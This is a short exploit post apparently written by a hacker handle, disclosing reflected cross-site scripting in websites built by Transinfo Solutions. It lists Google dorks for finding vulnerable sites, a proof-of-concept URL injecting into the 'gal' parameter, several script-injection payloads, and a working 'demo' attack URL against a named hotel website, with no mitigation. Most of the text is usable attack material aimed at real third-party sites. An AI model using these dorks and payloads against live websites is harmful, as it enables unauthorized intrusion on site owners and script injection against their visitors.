[+] Title: Transinfo Solutions Cross Site Scripting (XSS)
[+] date:2020-05-04
[+] Author: h4shur
[+] Vendor Homepage: transinfosolutions.com
[+] Software Link: transinfosolutions.com
[+] Tested on: Windows 10 & Google Chrome
[+] Vulnerable File: gal=
[+] Vulnerable Parameter: Get Method
[+} Dorks : intext:"Powered By: Transinfo Solutions"
intext:"Powered By: Transinfo Solutions" inurl:.php?id=
intext:"Powered By: Transinfo Solutions" inurl:gal=
### POC:
[+} site.com/[page].php?id=&gal=[XSS]&action=pic
### Xss Alert Code: "><svg onload=alert()>
'><script>alert('');</script>
<IMG "'"><script>alert()</script>'>
And Etc.
### Demo:
[+] http://hotelspringburn.com/gallery.php?id=2&gal=<script>alert('h4shur')</script>&action=pic
### Contact Me :
* Telegram : @h4shur
* Email : h4shursec@gmail.com
* Instagram : @netedit0r
* twitter : @h4shur